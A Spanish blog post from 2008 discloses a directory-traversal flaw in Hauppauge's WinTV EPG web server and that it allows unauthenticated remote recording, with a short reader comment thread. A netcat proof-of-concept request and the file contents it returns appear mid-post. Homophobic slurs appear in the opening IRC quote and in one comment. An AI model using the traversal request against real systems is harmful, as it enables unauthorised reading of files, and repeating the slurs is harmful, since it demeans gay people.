Random IRC quote :      <@ash> truchas! truchas! leones! leones! todos son unos maricones!

Cuidado con la telebasura

Los últimos estudios demuestran que la televisión es perjudicial para la salud, tanto para la mental por matar más neuronas que una litrona de whisky de garrafón (pobre Mario), como para la salud de tu ordenador.

Si eres de los que usa tarjetas de televisión WinTV de Hauppauge y gorros de papel de plata, estás de enhorabuena, desde 48bits te vamos a dar la razón para que dejes de utilizarla y te dediques a hacer algo más interesante, como ver porno en youtube.

El otro día cometí el error de instalar Windows Vista Ultimate para comprobar que tal funcionaba el media center, así que rapidamente fui a instalar todos los drivers disponibles para mi hardware, e incluso reciclar una Wintv HVR-1100 que tenía en el cajón. El software de WinTV, que directamente brilla por la ausencia de calidad, incluía un paquete llamado EPG, «Electronic program guide» que se ejecuta como un servicio y que sirve para visualizar, tanto local como remotamente la programación de la televisión, y así permitir via HTTP, grabar programas, como el teletienda, para su posterior visionado en MPEG4.


Cuando ojee por primera vez este software con un navegador, lo primero que me llamó la atención era que estaba escuchando por defecto en el puerto 80/tcp y que en el navegador veía algo así como «Hauppauge’s DVB EPG Webserver v0.5, generated Mon, 13 Oct 2008 10:12:39 GMT».

TV Scheduling

Como me conozco como funcionan las versiones betas, decidí probar algo arriesgado (XD), analizar el parser de HTTP. No voy a entrar en mucho detalle… porque no es necesario…

C:\>nc 192.168.1.2 80
GET /../../../../../Users/desktop.ini HTTP/1.0

HTTP/1.0 200 OK
Date: Mon, 13 Oct 2008 09:52:01 GMT
Server: HCW_DVB_EPG_SERVER_0_1
Accept-Ranges: bytes
Content-Length: 174
Connection: close
Content-Type: text/html


[ . S h e l l C l a s s I n f o ]
L o c a l i z e d R e s o u r c e N a m e = @ % S y s t e m R o o t % \ s y s t e m 3 2 \ s h e l l 3 2 . d l
l , – 2 1 8 1 3

Lo peor, aparte de esto, es que no se requiere ningún tipo de autorización/autenticación para programar tareas remotamente, por lo que cuando llegues a casa, a lo mejor te encuentras en tu disco duro con toda la temporada de «verano azul»

La versión de EPG vulnerable a un directory transversal es la última disponible hasta la fecha, la DVB-T EPG build 1.6.26136

5 Comentarios para “Cuidado con la telebasura”

  1. Comment por Gadix | 10/13/08 at 9:29 am

    Buaa, justo me estaba mirando una, casualidades xDDD
    Gracias por comentarlo

    Saludos,
    Gadix

  2. Comment por Luis | 10/13/08 at 12:45 pm

    pues eso de llegar a casa y encontrarte con algo asi de sorpresa tiene su punto no? xD

  3. Comment por Ruben | 10/13/08 at 3:38 pm

    Que crack! Cúrrate el exploit que te baje verano azul, eso sería peor que la del kaminsky…

  4. Comment por El listu | 10/15/08 at 10:10 am

    Podrias ejecutar código arbitrario!!! estos de Hauppauge… siempre fueron unos mariquitas, lo mejor es tener el antivirus y protecciones actualizadas para librarte de todo mal.

  5. Comment por Gadoh | 10/16/08 at 6:12 am

    En youtube no hay pr0n

Se han cerrado los comentarios